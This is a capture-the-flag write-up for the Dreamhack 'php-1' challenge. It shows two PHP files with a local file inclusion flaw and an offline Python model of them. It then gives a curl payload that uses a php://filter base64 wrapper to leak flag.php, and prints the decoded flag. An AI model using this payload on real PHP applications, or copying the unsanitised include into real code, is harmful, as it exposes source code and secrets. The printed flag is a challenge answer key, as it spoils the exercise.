php-1

Description

This is a Back Office service written in php.

Use the LFI vulnerability to obtain the flag. The flag is located in /var/www/uploads/flag.php

Analysis

Check the attached files. There are two PHP scripts, view.php and index.php.

view.php:

<?php
    // Takes a path from ?file= and prints the raw file contents.
    $file = $_GET['file'] ? $_GET['file'] : '';
    // Rejects any argument containing "flag" or ":" (case-insensitive).
    if (preg_match('/flag|:/i', $file)) {
        exit('Permission denied');
    }
    echo file_get_contents($file);
?>

index.php:

<?php
    // Includes ?page= with ".php" appended; defaults to main.php.
    include $_GET['page'] ? $_GET['page'] . '.php' : 'main.php';
?>

There are two candidate LFI sinks. view.php is not usable: its preg_match('/flag|:/i') rejects any file argument containing "flag" (so the flag's own path) or ":" (so any php:// wrapper that could smuggle the file out another way).

index.php is the usable sink. It passes $_GET['page'] straight into include and only appends ".php", so a php://filter wrapper with convert.base64-encode makes PHP return the target's source base64-encoded instead of executing it. For background on LFI and the php://filter technique, see owasp.org and whitehatinstitute.com.
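To make this reasoning concrete, here is an added Python model (not part of the original writeup or of the challenge) that replays the server-side logic of view.php and index.php against a constructed in-memory filesystem, so each payload can be checked offline. The flag.php contents are the decoded challenge output (with a tab indent, which is what the base64 encodes); the main.php entry and all function names are assumptions. It shows why view.php rejects both the literal path and the wrapper, why a plain include of flag.php would emit only the text outside the PHP tags, and why the resource in the payload must omit ".php".

```python
"""Offline model of the two file-inclusion sinks in the php-1 challenge.

Nothing here contacts the challenge host; it replays the server-side logic
of view.php and index.php against a constructed in-memory filesystem.
"""
import base64
import re
from typing import Optional

# Constructed stand-in for the server's filesystem. The flag.php content is
# the decoded challenge output (tab-indented); main.php is a placeholder.
FAKE_FS = {
    "/var/www/uploads/flag.php": (
        "<?php\n\t$flag = 'DH{bb9db1f303cacf0f3c91e0abca1221ff}';\n?>\n"
        "can you see $flag?"
    ),
    "main.php": "<h1>main</h1>\n",
}

VIEW_FILTER = re.compile(r"flag|:", re.IGNORECASE)  # preg_match('/flag|:/i')
PHP_FILTER = re.compile(r"^php://filter/read=([^/]+)/resource=(.+)$")
# PHP swallows a single newline directly after a closing ?> tag.
PHP_BLOCK = re.compile(r"<\?php.*?\?>\n?", re.DOTALL)


def view_php(file_param: str) -> str:
    """view.php: refuse anything containing 'flag' or ':', else dump the file."""
    if VIEW_FILTER.search(file_param):
        return "Permission denied"
    return FAKE_FS.get(file_param, "")


def index_include_target(page_param: str) -> str:
    """index.php: the exact string handed to include()."""
    return page_param + ".php" if page_param else "main.php"


def run_include(target: str) -> Optional[str]:
    """What include() emits for a plain path versus the php://filter wrapper.

    A plain path is executed, so only text outside <?php ... ?> reaches the
    client and $flag is assigned but never printed. With
    convert.base64-encode the wrapper returns the encoded source and PHP runs
    nothing. A missing file yields None (include warning, no output).
    """
    m = PHP_FILTER.match(target)
    if m:
        filt, resource = m.groups()
        src = FAKE_FS.get(resource)
        if src is None:
            return None
        if filt != "convert.base64-encode":
            raise NotImplementedError(filt)  # only the filter used here is modelled
        return base64.b64encode(src.encode()).decode()
    src = FAKE_FS.get(target)
    return None if src is None else PHP_BLOCK.sub("", src)


def exploit(resource_without_ext: str) -> str:
    """Build the ?page= value as in the solution and return the decoded flag."""
    page = f"php://filter/read=convert.base64-encode/resource={resource_without_ext}"
    b64 = run_include(index_include_target(page))
    if b64 is None:
        # index.php appended ".php", so passing "…/flag.php" asks for flag.php.php
        raise FileNotFoundError(resource_without_ext + ".php")
    src = base64.b64decode(b64).decode()
    flag = re.search(r"DH\{[0-9a-f]+\}", src)
    if not flag:
        raise ValueError("no flag in decoded source")
    return flag.group(0)


if __name__ == "__main__":
    print(view_php("/var/www/uploads/flag.php"))
    print(index_include_target("/var/www/uploads/flag.php"))
    print(run_include(index_include_target("/var/www/uploads/flag")))
    print(exploit("/var/www/uploads/flag"))
```

Running the module prints the denial from view.php, the doubled "flag.php.php" target, the flag-free text a direct include would produce, and finally the flag recovered through the wrapper.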

Solution

curl http://host3.dreamhack.games:20299/?page=php://filter/read=convert.base64-encode/resource=/var/www/uploads/flag

PD9waHAKCSRmbGFnID0gJ0RIe2JiOWRiMWYzMDNjYWNmMGYzYzkxZTBhYmNhMTIyMWZmfSc7Cj8+CmNhbiB5b3Ugc2VlICRmbGFnPw==

Note that resource=/var/www/uploads/flag.php will not work: index.php appends ".php" to whatever is passed in page, so the wrapper would be asked for /var/www/uploads/flag.php.php, which does not exist.

$_GET['page'].'.php'

Then decode the base64

echo -n PD9waHAKCSRmbGFnID0gJ0RIe2JiOWRiMWYzMDNjYWNmMGYzYzkxZTBhYmNhMTIyMWZmfSc7Cj8+CmNhbiB5b3Ugc2VlICRmbGFnPw== | base64 -d

<?php
	$flag = 'DH{bb9db1f303cacf0f3c91e0abca1221ff}';
?>
can you see $flag?

The flag is

DH{bb9db1f303cacf0f3c91e0abca1221ff}

Summary

view.php's blocklist stops both the literal flag path and any php:// wrapper, but index.php hands ?page= straight to include with only ".php" appended. Requesting php://filter/read=convert.base64-encode/resource=/var/www/uploads/flag makes PHP return the base64-encoded source of flag.php instead of executing it, and decoding it gives DH{bb9db1f303cacf0f3c91e0abca1221ff}.

This post is licensed under CC BY 4.0 by the author.